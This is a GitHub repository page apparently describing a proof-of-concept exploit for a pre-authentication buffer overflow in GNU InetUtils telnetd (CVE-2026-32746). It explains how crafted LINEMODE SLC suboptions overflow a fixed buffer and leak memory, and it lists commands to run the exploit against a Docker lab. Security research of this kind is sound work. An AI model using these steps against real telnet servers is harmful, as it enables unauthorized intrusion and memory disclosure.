Skip to content

jeffaf/cve-2026-32746

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

9 Commits
.gitignore
.gitignore
 
 
Dockerfile
Dockerfile
 
 
LICENSE
LICENSE
 
 
README.md
README.md
 
 
detect.py
detect.py
 
 
docker-compose.yml
docker-compose.yml
 
 
exploit.py
exploit.py
 
 
xinetd-telnet.conf
xinetd-telnet.conf
 
 

Repository files navigation

CVE-2026-32746 - telnetd LINEMODE SLC Buffer Overflow

Pre-authentication buffer overflow in GNU InetUtils telnetd's LINEMODE SLC (Set Local Characters) handler.

CVSS 3.1: 9.8 (Critical) | CWE: CWE-120, CWE-787

Overview

The add_slc() function in telnetd/slc.c appends 3 bytes per SLC triplet to a fixed 108-byte buffer (slcbuf) without bounds checking. An unauthenticated attacker can send a crafted SLC suboption with 40+ triplets (function codes > 18/NSLC) during option negotiation - before any login prompt - overflowing the buffer and corrupting the slcptr pointer and adjacent data in BSS.

Affected

  • GNU InetUtils telnetd through 2.7 (all versions)
  • Any telnetd derived from the BSD SLC codebase
  • Patch expected by April 1, 2026

What This PoC Does

  • ✅ Triggers the buffer overflow and verifies it via SLC response analysis (leaked BSS data)
  • ❌ Does NOT achieve code execution (no shellcode/ROP chain)

Quick Start

# Build the vulnerable lab environment
docker compose up -d

# Detect (non-destructive)
python3 detect.py 127.0.0.1 2323

# Exploit (triggers overflow, verifies via response)
python3 exploit.py 127.0.0.1 2323

# Clean up
docker compose down

Lab Environment

The Docker setup runs a Debian container with inetutils-telnetd 2.4 under xinetd, exposed on port 2323. Fully isolated - nothing touches your host.

How It Works

  1. Connect to telnetd and complete initial option negotiation
  2. Client proactively sends WILL LINEMODE to trigger LINEMODE negotiation
  3. Server responds with DO LINEMODE and enters SLC suboption processing
  4. Client sends a crafted SLC suboption containing 40-60 triplets with function codes > 18 (NSLC)
  5. add_slc() queues a "not supported" reply (3 bytes) for each triplet into a 104-byte buffer
  6. After ~35 triplets, the buffer overflows, corrupting slcptr and adjacent BSS data
  7. end_slc() sends everything from slcbuf to the corrupted slcptr position, including leaked BSS memory in the response
  8. The server process remains alive; the overflow is confirmed by the oversized SLC response

Files

File Description
exploit.py PoC overflow with response-based verification
Dockerfile Vulnerable telnetd lab
docker-compose.yml One-command lab setup
xinetd-telnet.conf xinetd service config
detect.py Non-destructive version detection script

Further Reading

For deep exploitation analysis including byte constraints, alignment techniques, and the def_slcbuf/free() primitive on 32-bit systems, see WatchTowr's writeup.

References

Disclaimer

This tool is provided for authorized security testing and educational purposes only. Do not use against systems you do not own or have explicit permission to test. The author is not responsible for misuse.

Credits

  • Vulnerability discovered by: Adiel Sol, Arad Inbar, Erez Cohen, Nir Somech, Ben Grinberg, Daniel Lubel (DREAM Security Research Team)

License

MIT

About

CVE-2026-32746 - GNU InetUtils telnetd LINEMODE SLC Buffer Overflow PoC (pre-auth RCE, CVSS 9.8)

Resources

Readme

License

MIT license
Activity

Stars

23 stars

Watchers

0 watching

Forks

10 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors 1

Languages